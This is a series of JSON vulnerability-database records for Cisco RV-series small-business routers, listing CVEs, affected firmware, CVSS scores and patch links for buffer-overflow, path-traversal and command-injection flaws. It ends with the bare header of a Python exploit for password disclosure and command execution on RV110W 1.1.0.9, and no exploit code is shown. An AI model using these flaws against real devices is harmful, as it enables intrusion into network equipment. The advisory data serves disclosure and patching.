"https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rv110w", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.5" }, { "model": "rv130w", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.54" }, { "model": "rv130", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.54" }, { "model": "rv215w", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.5" }, { "model": "rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv130w wireless-n multifunction vpn routerr", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-35167" }, { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "NVD", "id": "CVE-2020-3269" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:cisco:rv110w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv130w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv215w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv130_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-006870" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Kai Cheng", "sources": [ { "db": "CNNVD", "id": "CNNVD-202006-1157" } ], "trust": 0.6 }, "cve": "CVE-2020-3269", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2020-3269", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 9.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "JVNDB-2020-006870", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2020-35167", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2020-3269", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ykramarz@cisco.com", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2020-3269", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-006870", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-3269", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2020-3269", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2020-006870", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-35167", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202006-1157", "trust": 0.6, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-35167" }, { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "CNNVD", "id": "CNNVD-202006-1157" }, { "db": "NVD", "id": "CVE-2020-3269" }, { "db": "NVD", "id": "CVE-2020-3269" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W is a VPN firewall router from Cisco in the United States. \n\r\n\r\nThere are buffer overflow vulnerabilities in the web management interface of many Cisco products. The vulnerability stems from the program\u0027s failure to properly limit user input boundaries", "sources": [ { "db": "NVD", "id": "CVE-2020-3269" }, { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "CNVD", "id": "CNVD-2020-35167" } ], "trust": 2.16 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2020-3269", "trust": 3.0 }, { "db": "JVNDB", "id": "JVNDB-2020-006870", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2020-35167", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.2119", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.2119.2", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202006-1157", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-35167" }, { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "CNNVD", "id": "CNNVD-202006-1157" }, { "db": "NVD", "id": "CVE-2020-3269" } ] }, "id": "VAR-202006-1114", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2020-35167" } ], "trust": 1.2765999149999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-35167" } ] }, "last_update_date": "2024-11-23T21:35:43.614000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-routers-injection-tWC7krKQ", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-injection-tWC7krKQ" }, { "title": "Patch for Multiple Buffer Overflow Vulnerabilities in Cisco Products (CNVD-2020-35167)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/223607" }, { "title": "Multiple Cisco Product Buffer Error Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=121850" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-35167" }, { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "CNNVD", "id": "CNNVD-202006-1157" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 }, { "problemtype": "CWE-787", "trust": 1.0 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "NVD", "id": "CVE-2020-3269" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-routers-injection-twc7krkq" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3269" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3269" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2119/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2119.2/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-35167" }, { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "CNNVD", "id": "CNNVD-202006-1157" }, { "db": "NVD", "id": "CVE-2020-3269" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2020-35167" }, { "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "db": "CNNVD", "id": "CNNVD-202006-1157" }, { "db": "NVD", "id": "CVE-2020-3269" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-06-30T00:00:00", "db": "CNVD", "id": "CNVD-2020-35167" }, { "date": "2020-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "date": "2020-06-17T00:00:00", "db": "CNNVD", "id": "CNNVD-202006-1157" }, { "date": "2020-06-18T03:15:12.073000", "db": "NVD", "id": "CVE-2020-3269" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-06-30T00:00:00", "db": "CNVD", "id": "CNVD-2020-35167" }, { "date": "2020-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-006870" }, { "date": "2021-10-20T00:00:00", "db": "CNNVD", "id": "CNNVD-202006-1157" }, { "date": "2024-11-21T05:30:41.823000", "db": "NVD", "id": "CVE-2020-3269" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202006-1157" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Cisco RV Buffer error vulnerability in series routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-006870" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202006-1157" } ], "trust": 0.6 } }
var-201810-0304
Vulnerability from variot
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to the targeted device. A successful exploit could allow the attacker to gain access to arbitrary files on the affected device, resulting in the disclosure of sensitive information. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0304", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rv110w wireless-n vpn firewall", "scope": null, "trust": 1.4, "vendor": "cisco", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 1.4, "vendor": "cisco", "version": null }, { "model": "rv130w", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.44" }, { "model": "rv215w", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "1.3.0.8" }, { "model": "rv110w", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "1.2.1.7" }, { "model": "rv130w wireless-n multifunction vpn routerr", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1.0.1.3" }, { "model": "rv215w", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1.3.0.8" }, { "model": "rv110w", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1.2.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1.0.2.7" }, { "model": "rv130w", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1.0.0.21" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "CNNVD", "id": "CNNVD-201809-262" }, { "db": "NVD", "id": "CVE-2018-0426" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:cisco:rv110w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv130w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv215w_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-010840" } ] }, "cve": "CVE-2018-0426", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-0426", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2018-18072", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-118628", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-0426", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-0426", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-0426", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2018-18072", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201809-262", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-118628", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "VULHUB", "id": "VHN-118628" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "CNNVD", "id": "CNNVD-201809-262" }, { "db": "NVD", "id": "CVE-2018-0426" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to the targeted device. A successful exploit could allow the attacker to gain access to arbitrary files on the affected device, resulting in the disclosure of sensitive information. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router", "sources": [ { "db": "NVD", "id": "CVE-2018-0426" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "VULHUB", "id": "VHN-118628" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-0426", "trust": 3.1 }, { "db": "SECTRACK", "id": "1041678", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2018-010840", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201809-262", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2018-18072", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-118628", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "VULHUB", "id": "VHN-118628" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "CNNVD", "id": "CNNVD-201809-262" }, { "db": "NVD", "id": "CVE-2018-0426" } ] }, "id": "VAR-201810-0304", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "VULHUB", "id": "VHN-118628" } ], "trust": 1.2914166040000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-18072" } ] }, "last_update_date": "2024-11-23T23:02:00.654000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20180905-rv-routers-traversal", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-traversal" }, { "title": "CiscoRV110W, RV130W, RV215W Directory Traversal Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/139765" }, { "title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router Repair measures for path traversal vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84593" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "CNNVD", "id": "CNNVD-201809-262" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-118628" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "NVD", "id": "CVE-2018-0426" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-traversal" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1041678" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0426" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0426" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "VULHUB", "id": "VHN-118628" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "CNNVD", "id": "CNNVD-201809-262" }, { "db": "NVD", "id": "CVE-2018-0426" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2018-18072" }, { "db": "VULHUB", "id": "VHN-118628" }, { "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "db": "CNNVD", "id": "CNNVD-201809-262" }, { "db": "NVD", "id": "CVE-2018-0426" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-09-11T00:00:00", "db": "CNVD", "id": "CNVD-2018-18072" }, { "date": "2018-10-05T00:00:00", "db": "VULHUB", "id": "VHN-118628" }, { "date": "2018-12-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "date": "2018-09-06T00:00:00", "db": "CNNVD", "id": "CNNVD-201809-262" }, { "date": "2018-10-05T14:29:01.170000", "db": "NVD", "id": "CVE-2018-0426" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-09-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-18072" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-118628" }, { "date": "2018-12-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-010840" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201809-262" }, { "date": "2024-11-21T03:38:12.290000", "db": "NVD", "id": "CVE-2018-0426" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201809-262" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Cisco Path traversal vulnerability in products", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-010840" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "path traversal", "sources": [ { "db": "CNNVD", "id": "CNNVD-201809-262" } ], "trust": 0.6 } }
var-201608-0273
Vulnerability from variot
The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. A local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. This issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. The following products are affected: RV110W Wireless-N VPN Firewall RV130W Wireless-N Multifunction VPN Router RV215W Wireless-N VPN Router. #!/usr/bin/env python2
Cisco RV110W Password Disclosure and OS Command Execute.
Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
Date: 2018-08
Exploit Author: RySh
Vendor Homepage: https://www.cisco.com/
Version: 1.1.0.9
Tested on: RV110W 1.1.0.9
